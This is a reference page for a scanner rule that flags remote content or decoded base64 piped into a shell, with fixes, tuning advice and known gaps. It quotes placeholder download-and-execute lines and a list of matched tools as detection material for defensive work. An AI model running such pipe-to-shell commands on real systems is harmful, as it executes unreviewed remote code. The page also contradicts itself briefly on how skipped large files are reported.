IH-EXEC-001criticalExecution

Remote content piped into an interpreter

Fetching remote text and passing it straight to a shell or runtime executes attacker-controlled code.

What does IH-EXEC-001 flag?

Flags a line that downloads text from the internet and hands it straight to a shell or language runtime, so whatever the server sends back runs at once.

  • A download tool (curl, wget, iwr, Invoke-WebRequest or Invoke-RestMethod) on the same line as a pipe into sh, bash, zsh, python, node, PowerShell, pwsh or Invoke-Expression, with or without sudo in front of the interpreter.
  • A shell or runtime started on a command substitution that calls curl or wget.
  • A shell reading from a process substitution that starts with curl or wget.
  • base64 decoding (-d or --decode, any case) piped into a shell or runtime on the same line.

Why it matters

Nobody reviews the code that runs. The server can change it at any time, and it runs with the permissions of whoever pastes it, or of the agent. The ClawHub malware waves reported in early 2026 used this exact step, often hidden behind base64 so the line looks like an installer banner.

Examples

Illustrative shapes with placeholders in angle brackets. They show what the rule looks at; they are not runnable and not taken from real malware.

Remote text piped to a shell
Flagged
curl <remote-url> | sh
Decoded blob piped to a shell
Flagged
echo <base64-text> | base64 -d | bash
Download to a file first
Not flagged
curl -o setup.sh <remote-url>

Can IH-EXEC-001 fire on a safe skill?

  • Vendor install one-liners for real tools match too. The rule cannot tell a trusted vendor from an attacker; that judgment stays with you.
  • Documentation that quotes the pattern as a warning matches, because matching is per line and does not read intent.

How do I fix an IH-EXEC-001 finding?

  • Download the script to a file, read it, pin a version or checksum, and run the local copy.
  • Better still, install the tool from its language registry or the operating-system package manager.

CLI guidance: Download to a file, review it, and run a pinned local copy instead of piping a URL into a shell.

How do I tune or allow IH-EXEC-001?

If you have read the installer and accept it, exclude that one file with ignoreGlobs rather than turning off a critical rule for the whole project. Keep the change in the project's own ironheights.config.json rather than your global one.

{
  "ignoreGlobs": [
    "scripts/reviewed-installer.sh"
  ]
}

Every key is described in Configuration. To print this rule from the CLI, run ironheights rules show IH-EXEC-001.

What can IH-EXEC-001 miss?

  • Commands split across lines or variables, or assembled at run time.
  • A payload that lives on a paste site or lookalike website the skill only links to. The link alone raises IH-NET-001 at most.
  • Files larger than the scan size limit (1 MiB by default). They are skipped without being read, and the verdict can still read no findings.

No finding means no rule matched. It is not proof of safety. Files larger than 1 MiB are skipped without being read; the verdict is then incomplete, not no findings, but the file is still not checked. See Limitations.

In the tracker

Publicly reported cases where a synthetic copy of the reported pattern raises IH-EXEC-001. Coverage is about the pattern, not a scan of the original files.

Scores and thresholds shown are the CLI defaults; your config can change them. List every rule from the terminal with ironheights rules list.

All 35 rules